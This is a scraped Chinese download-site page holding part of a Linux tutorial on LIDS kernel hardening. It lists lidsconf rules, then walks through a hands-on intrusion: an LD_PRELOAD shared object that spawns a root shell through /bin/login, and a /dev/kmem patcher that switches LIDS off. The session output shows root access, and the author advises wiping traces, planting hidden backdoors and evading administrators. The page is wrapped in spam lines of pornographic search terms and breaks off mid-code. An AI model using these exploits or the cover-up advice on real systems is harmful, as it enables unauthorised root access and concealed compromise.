亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 5.html

?? 介紹linux下文件和設備編程
?? HTML
?? 第 1 頁 / 共 5 頁
字號:
/sbin/lidsconf -A -s /bin/login -o /var/log/wtmp -j WRITE<br>/sbin/lidsconf -A -s /bin/login -o /var/log/lastlog -j WRITE<br>/sbin/lidsconf -A -s /sbin/init -o /var/log/wtmp -j WRITE<br>/sbin/lidsconf -A -s /sbin/init -o /var/log/lastlog -j WRITE<br>/sbin/lidsconf -A -s /sbin/halt -o /var/log/wtmp -j WRITE<br>/sbin/lidsconf -A -s /sbin/halt -o /var/log/lastlog -j WRITE<br>/sbin/lidsconf -A -s /etc/rc.d/rc.sysinit -o /var/log/wtmp -i 1 -j WRITE<br>/sbin/lidsconf -A -s /etc/rc.d/rc.sysinit -o /var/log/lastlog -i 1 -j WRITE<p># Shutdown<br>/sbin/lidsconf -A -s /sbin/init -o CAP_INIT_KILL -j GRANT<br>/sbin/lidsconf -A -s /sbin/init -o CAP_KILL -j GRANT<br># Give the following init script the proper privileges to kill processes and<br># unmount the file systems. However, anyone who can execute these scripts<br># by themselves can effectively kill your processes. It's better than<br># the alternative, however.<br>/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_INIT_KILL -i 1 -j GRANT<br>/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_KILL -i 1 -j GRANT<br>/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_NET_ADMIN -i 1 -j GRANT<br>/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_ADMIN -i 1 -j GRANT<br>/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_RAWIO -i 1 -j GRANT<p># Other<br>/sbin/lidsconf -A -s /sbin/update -o CAP_SYS_ADMIN -j GRANT<br>/sbin/lidsconf -A -s /sbin/consoletype -o CAP_SYS_ADMIN -j GRANT<p>#Protect and hide Httpd<br>/sbin/lidsconf -A -o /etc/httpd -j DENY<br>/sbin/lidsconf -A -s /usr/sbin/httpd -o /etc/httpd -j READONLY<br>/sbin/lidsconf -A -s /usr/sbin/httpd -o CAP_HIDDEN -j GRANT<br>---------------------------------------------------------------------------------<br>&nbsp;&nbsp;&nbsp; 運行命令/sbin/lidsadm -S -- -LIDS切換到不受lids保護的狀態(tài),然后執(zhí)行配置腳本,運行命令/sbin/lidsadm -S -- +RELOAD_CONF,更新lids配置,最后lidsadm -S -- +LIDS切換到lids保護狀態(tài)<br>&nbsp;&nbsp;&nbsp; 通過命令如ls /etc/shadow、ls /etc/lids、touch /sbin/x、ps ax|grep http等命令測試lids保護的文件、目錄和進程等;通過掃描器掃描測試lids的檢測功能以及l(fā)ids的響應功能等。最好的辦法是模仿黑客成功入侵后所做的活動,如裝rootkit等來檢驗lids的主要功能。<p><center><A HREF="#Content">[目錄]</A></center><hr><br><A NAME="I729" ID="I729"></A><center><b><font size=+2>漏洞測試</font></b></center><br>2.漏洞測試:<br>&nbsp;&nbsp;&nbsp; LD_PRELOAD能夠編寫一個LIDS可執(zhí)行任意代碼的程序,這意味著入侵者能夠獲得LIDS配置下的權限和文件訪問能力,如果用CAP_SYS_RAWIO 或者CAP_SYS_MODULE,入侵者可以停掉LIDS并且獲得訪問一切文件的權限。 在某些配置下,還能夠獲得root權限。<p>可以到下載下面的測試程序:<br>http://www.lids.org/download/test-lids.sh<br>http://www.lids.org/download/test-lids.sh.asc<p>&nbsp;&nbsp;&nbsp; 下面開始入侵裝有l(wèi)ids的linux,當然該lids是有bug的了。<br>&nbsp;&nbsp;&nbsp; 首先是獲得一個普通帳號了,通過finger、sendmail等或是社交工程都可以,相信難不倒各位,只要有個帳號就可以,當然還需要能夠遠程登錄,如果能本機登錄就更好了!<p>[test@rh72 test]$ls /proc/sys<br>abi debug dev fs kernel lids net proc<br>[test@rh72 test]$ls /sbin/lids*<br>/sbin/lidsadm /sbin/lidsconf<br>--可見該系統(tǒng)安裝了lids<p>[test@rh72 test]$vi testlids.sh<br>---------------------------------------------------------------------------------<br>#!/bin/sh<p># Creates /tmp/boom.so you might<br># use to let LIDS leak capabilities<br># to your shell.<p>cat&gt;/tmp/boom.c&lt;&lt;_EOF_;<br>#include &lt;stdio.h&gt;<br>#include &lt;unistd.h&gt;<br>#include &lt;fcntl.h&gt;<p>_init()<br>{<br>char *a[] = {&quot;/bin/bash&quot;, NULL};<br>setuid(0);<br>close(0);close(1);close(2);<br>open(&quot;/dev/tty&quot;, O_RDWR);<br>dup(0);<br>dup(1);<br>execve(*a,a,NULL);<br>return -1;<br>}<p>_EOF_<p>cc -c -fPIC /tmp/boom.c -o /tmp/boom.o<br>ld -Bshareable /tmp/boom.o -o /tmp/boom.so<br>echo &quot;OK&quot;;<br>---------------------------------------------------------------------------------<br>[test@rh72 test]$ chmod +x testlids.sh<br>[test@rh72 test]$ ./testlids.sh<br>OK<br>[test@fire lids]$ LD_PRELOAD=/tmp/boom.so /bin/login<br>[root@fire lids]# whoami<br>root<br>&nbsp;&nbsp;&nbsp; 哇塞,這么容易就獲得root權限了,比沒有裝lids的linux更容易,真爽!:)<br>可見,普通用戶通過LD_PRELOAD可以直接從裝有存在bug的lids的系統(tǒng)中獲得超級用戶權限,所以安裝lids的管理員一定要注意升級和配置lids。<p>(之所以通過/bin/login直接獲得root權限是因為采用如下的lids配置命令<br>/sbin/lidsconf -A -s /bin/login -o CAP_SETUID -j GRANT<br>/sbin/lidsconf -A -s /bin/login -o CAP_SETGID -j GRANT<br>/sbin/lidsconf -A -s /bin/login -o CAP_CHOWN -j GRANT<br>/sbin/lidsconf -A -s /bin/login -o CAP_FSETID -j GRANT )<p>[root@fire lids]# ./capscan -b (capscan用來探測lids的功能約束)<br>b 5 CAP_KILL<br>[root@fire lids]# touch /sbin/xlids<br>touch: /sbin/xlids: Operation not permitted<br>[root@fire lids]#LD_PRELOAD=/tmp/boom.so /etc/rc.d/init.d/halt<br>[root@fire lids]# ./capscan -b<br>b 5 CAP_KILL<br>b 12 CAP_NET_ADMIN<br>b 17 CAP_SYS_RAWIO<br>b 21 CAP_SYS_ADMIN<br>b 27 CAP_MKNOD<br>--可見我們已經(jīng)從halt腳本獲得了CAP_NET_ADMIN、CAP_SYS_RAWIO和CAP_SYS_ADMIN功能<br>[root@fire lids]# touch /sbin/xlids<br>touch: /sbin/xlids: Operation not permitted<br>[root@fire lids]# ls -al /etc/lids<br>ls: /etc/lids: No such file or directory<br>[root@fire lids]# /sbin/lidsconf -L<br>LIST<br>LIDS: lidsconf(dev 3:1 inode 150018) pid 630 ppid 581 uid/gid (0/0) on (vc/1):<br>access hidden file /etc/lids/lids.conf<br>lidsconf:cannot open /etc/lids/lids.conf<br>reason: No such file or directory<br>--可見lids仍起作用,并對/sbin和/etc/lids作了保護,其中/sbin作了只讀保護,/etc/lids拒絕訪問<br>[root@fire lids]#vi lidsoff.c<br>---------------------------------------------------------------------------------<br>#lidsoff.c: //主要是將內(nèi)核中的變量lids_load置為0<p>/* Simple and stupid kmem patcher for LIDS.<br>* Licensed under the GPL. :-)<br>*/<br>#include &lt;stdio.h&gt;<br>#include &lt;unistd.h&gt;<br>#include &lt;fcntl.h&gt;<br>#include &lt;errno.h&gt;<br>#include &lt;stdlib.h&gt;<p>void die(const char *s)<br>{<br>perror(s);<br>exit(errno);<br>}<p><br>int main(int argc, char **argv)<br>{<p>char zero;<br>off_t off;<br>int kmem;<p>if (argc &lt; 2) {<br>printf(&quot;Usage: %s &lt;addr-of-lids_local_on-in-hex&gt;\n\n&quot;, *argv);<br>return 1;<br>}<p>kmem = open(&quot;/dev/kmem&quot;, O_RDWR);<br>if (kmem &lt; 0)<br>die(&quot;open&quot;);<p>off = strtoul(argv[1], 0, 16);<br>printf(&quot;# Patching [%x]\n&quot;, off-4);<p>lseek(kmem, off-4, SEEK_SET);<br>read(kmem, &amp;zero, sizeof(zero));<br>printf(&quot;%d -&gt; 0\n&quot;, zero);<p>lseek(kmem, off-4, SEEK_SET);<br>zero = 0;<br>write(kmem, &amp;zero, sizeof(zero));<br>close(kmem);<br>return 0;<br>}<br>---------------------------------------------------------------------------------<br>[root@fire lids]# gcc -o lidsoff lidsoff.c<br>[root@fire lids]# grep lids /proc/ksyms<br>c0113868 lids_send_message_Rsmp_ccaa3a65<br>c029af60 lids_load_Rsmp_a57ab5ad<br>c029af64 lids_local_on_Rsmp_641824fe<br>c029af6c lids_local_pid_Rsmp_2a2dd337<br>c0129270 lids_local_off_Rsmp_445f75c1<br>[root@fire lids]# ./lidsoff<br>Usage: ./lidsoff &lt;addr-of-lids_local_on-in-hex&gt;<br>[root@fire lids]# ./lidsoff c029af64<br># Patching [c029af60]<br>1 -&gt; 0<br>哈哈, lids已經(jīng)關閉了,不再起作用了!<br>[root@fire lids]# ls /etc/lids/lids.conf<br>/etc/lids/lids.conf<br>[root@fire lids]# touch /sbin/xlids<p>&nbsp;&nbsp;&nbsp; 至此,已經(jīng)完全控制了裝有l(wèi)ids的linux,很easy是吧,最后別忘了擦腳印、裝后門。當然可以利用lids隱藏后門程序目錄和進程了,連rootkit都可以省了。完事后切換lids的狀態(tài),不然管理員很容易就發(fā)現(xiàn)入侵了。不過受害機器的控制臺上可能會有一些警告顯示,最好是重起或者用一些掃描信息替換掉!:)<br><center><A HREF="#Content">[目錄]</A></center><hr><br><A NAME="I727" ID="I727"></A><center><b><font size=+2>附錄</font></b></center><br>lids解決辦法:<p>對于2.4用戶:<br>http://www.lids.org/download/lids-1.1.1pre2-2.4.16.tar.gz<br>http://www.lids.org/download/lids-1.1.1pre2-2.4.16.tar.gz.asc<br>(或者lids-1.1.1pre2以后的版本)<p>對于2.2用戶:<br>http://www.lids.org/download/LIDS-security-patch-0.10.1-2.2.20.diff.gz<br>http://www.lids.org/download/LIDS-security-patch-0.10.1-2.2.20.diff.gz.asc<br>(或者lids-0.11.0以后的版本)<p>附capscan 源程序:<br>--------------[ stealth &lt;stealth@segfault.net&gt; ]--------------------------------<br>#cap.h<br>---------------------------------------------------------------------------------<br>#ifndef __cap_h__<br>#define __cap_h__<p>#include &lt;linux/capability.h&gt;<p>typedef struct __user_cap_header_struct cap_user_header;<br>typedef struct __user_cap_data_struct cap_user_data;<p>int capget(cap_user_header_t,cap_user_data_t);<br>int capset(cap_user_header_t,cap_user_data_t);<br>int print_cap(cap_user_data_t, cap_user_data_t);<p>int brute_caps();<p>#endif<br>---------------------------------------------------------------------------------<br># cap.c<br>---------------------------------------------------------------------------------<br>#include &lt;stdio.h&gt;<br>#include &lt;string.h&gt;<br>#include &lt;unistd.h&gt;<br>#include &lt;fcntl.h&gt;<br>#include &lt;stdlib.h&gt;<br>#include &lt;sys/types.h&gt;<br>#include &lt;sys/socket.h&gt;<br>#include &lt;netinet/in.h&gt;<br>#include &lt;signal.h&gt;<br>#include &lt;sys/ioctl.h&gt;<br>#include &lt;net/if.h&gt;<br>#include &lt;linux/module.h&gt;<br>#include &lt;errno.h&gt;<br>#include &lt;sys/ptrace.h&gt;<br>#include &lt;sys/stat.h&gt;<br>#include &quot;cap.h&quot;<p>extern int wait(int *);<p>int try_chown()<br>{<br>char p[] = &quot;/tmp/fooXXXXXX&quot;;<br>int r, fd = mkstemp(p);<br>if (fd &lt; 0)<br>return 0;<br>close(fd);<p>/* try a give-away */<br>if (chown(p, getuid()+1, getgid()+1) &lt; 0)<br>r = 0;<br>else<br>r = 1;<p>unlink(p);<br>return r;<br>}<p><br>int try_setuid()<br>{<br>int euid = geteuid();<p>if (seteuid(euid + 1) &lt; 0)<br>return 0;<p>seteuid(euid);<br>return 1;<br>}<p><br>int try_setgid()<br>{<br>int egid = getegid();<p>if (setegid(egid + 1) &lt; 0)<br>return 0;<p>setegid(egid);<br>return 1;<br>}<p><br>int try_kill()<br>{<br>/* XXX: suffices? */<br>if (kill(1, SIGCONT) &lt; 0)<br>return 0;<br>return 1;<br>}<p><br>int try_bind()<br>{<br>struct sockaddr_in sin;<br>int r, fd = socket(PF_INET, SOCK_STREAM, 0);<br>if (fd &lt; 0)<br>

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美亚洲一区二区在线| 日韩av在线发布| 亚洲欧美日韩中文播放| 一区二区三区中文在线观看| 亚洲精品日韩一| 午夜伊人狠狠久久| 丁香婷婷综合激情五月色| 91香蕉视频mp4| 日韩一级大片在线观看| 亚洲欧洲国产日韩| 国产永久精品大片wwwapp| 99国产精品国产精品毛片| 91麻豆精品久久久久蜜臀| 91精品麻豆日日躁夜夜躁| 91精品国产免费| 亚洲欧美在线视频| 国产精品一区专区| 欧美mv日韩mv| 美女一区二区三区| 69堂精品视频| 亚洲va欧美va人人爽午夜| 色综合久久久网| 国产精品久久午夜夜伦鲁鲁| 成人h动漫精品一区二区| 中文字幕亚洲在| 色婷婷国产精品综合在线观看| 久久精品人人做人人爽97| 另类小说欧美激情| 中文字幕乱码久久午夜不卡 | 国产亚洲一区二区三区四区| 久久国产日韩欧美精品| 精品视频123区在线观看| 精品处破学生在线二十三| 欧美一区二区精美| 久久综合九色综合97婷婷| 久久亚洲精精品中文字幕早川悠里| 2023国产精品视频| 中文字幕永久在线不卡| 一区二区三区日韩| 蜜臀va亚洲va欧美va天堂| 婷婷综合五月天| 国产suv精品一区二区883| 欧洲人成人精品| 国产区在线观看成人精品| 一区二区在线免费观看| 日韩精品成人一区二区在线| 成人伦理片在线| 日韩一区二区在线观看视频| 一区二区中文字幕在线| 性久久久久久久久| caoporn国产一区二区| 欧美一卡二卡在线观看| 一区二区三区蜜桃| 国产成人aaa| 国产亚洲综合在线| 青草av.久久免费一区| 欧洲另类一二三四区| 国产精品九色蝌蚪自拍| 成人午夜精品一区二区三区| 国产色婷婷亚洲99精品小说| 美美哒免费高清在线观看视频一区二区| 波多野结衣视频一区| 精品国产伦一区二区三区免费| 日韩av一级电影| 99re66热这里只有精品3直播| 国产日韩欧美制服另类| 久久精品免费看| 久久影院午夜片一区| 国产精品18久久久久久久久久久久| 日韩一区二区免费高清| 久久99久久精品欧美| 26uuu欧美| 91啦中文在线观看| 午夜激情一区二区三区| 欧美一级二级三级乱码| 狠狠网亚洲精品| 欧美国产1区2区| 欧美日韩成人综合天天影院 | 91在线国产观看| 亚洲精品免费在线| 欧美剧在线免费观看网站| 激情综合色播激情啊| 国产精品色噜噜| 欧美日产在线观看| 国产成人在线视频网站| 亚洲一区二区三区免费视频| 91精品国产色综合久久| 国产精品自拍av| 亚洲一区在线观看视频| 久久久不卡影院| 欧美一区永久视频免费观看| 成人免费视频视频| 日日摸夜夜添夜夜添亚洲女人| 国产日韩欧美亚洲| 日韩亚洲欧美成人一区| 在线免费观看日韩欧美| 成人激情午夜影院| 六月婷婷色综合| 日本特黄久久久高潮| 亚洲精品va在线观看| 国产精品色噜噜| 国产欧美日本一区视频| 精品国产91九色蝌蚪| 欧美一三区三区四区免费在线看| 日本二三区不卡| 99久久精品免费精品国产| 北岛玲一区二区三区四区| 国产精品资源在线观看| 国内成人自拍视频| 国产美女一区二区三区| 激情综合五月天| 国产尤物一区二区在线| 成人app下载| 高清beeg欧美| 91网站最新网址| 欧美亚洲自拍偷拍| 欧美精品一区二区三区蜜桃视频| 久久婷婷综合激情| 亚洲手机成人高清视频| 亚洲精品va在线观看| 日韩国产欧美三级| 美女视频黄免费的久久| 国产91精品欧美| 在线看一区二区| 欧美成人a视频| 国产欧美日韩不卡| 日韩精品一级二级| thepron国产精品| 91精品国产91热久久久做人人| 久久久久久亚洲综合影院红桃| 国产精品亲子伦对白| 琪琪一区二区三区| 日本高清视频一区二区| 2023国产精品自拍| 亚洲成人av电影在线| av在线不卡免费看| 日本一区二区三区免费乱视频| 亚洲一区中文在线| 不卡视频一二三| 亚洲精品在线观看视频| 日产国产欧美视频一区精品 | 欧美片网站yy| 亚洲色图欧洲色图| 成人av午夜电影| 国产精品激情偷乱一区二区∴| 久久超级碰视频| 精品女同一区二区| 国产一区二区精品久久91| 91精品国产综合久久精品麻豆| 一区二区免费在线| 欧美在线免费视屏| 亚洲国产精品一区二区久久| aa级大片欧美| 天堂va蜜桃一区二区三区| 91精品综合久久久久久| 极品瑜伽女神91| 国产精品入口麻豆九色| 成人精品国产免费网站| 亚洲综合视频网| 欧美一区二区三区四区五区| 亚洲国产精品影院| 国产日韩一级二级三级| 91福利社在线观看| 国产精品一区二区你懂的| 最新高清无码专区| 6080yy午夜一二三区久久| 成人午夜在线免费| 一区二区三区中文在线观看| 3751色影院一区二区三区| 国产成人超碰人人澡人人澡| 亚洲精品中文在线| 日韩精品一区二区三区视频| 日本韩国精品在线| 国产九九视频一区二区三区| 亚洲成人午夜影院| 一区在线观看免费| 欧美一三区三区四区免费在线看 | 国内精品久久久久影院一蜜桃| 亚洲视频图片小说| 国产片一区二区| 26uuu欧美| 亚洲精品一区二区在线观看| 欧美中文字幕一区| 一本大道久久a久久综合| 成人黄色大片在线观看| 国产精品一区专区| 国产麻豆精品视频| 国产黄色精品视频| 国产一区亚洲一区| 久久国产综合精品| 精久久久久久久久久久| 蜜臀a∨国产成人精品| 日韩极品在线观看| 久久成人综合网| 粉嫩av一区二区三区粉嫩 | 成人爽a毛片一区二区免费| 国产精品亚洲人在线观看| 国产一区在线观看视频| 国产精华液一区二区三区| 99久久精品国产麻豆演员表|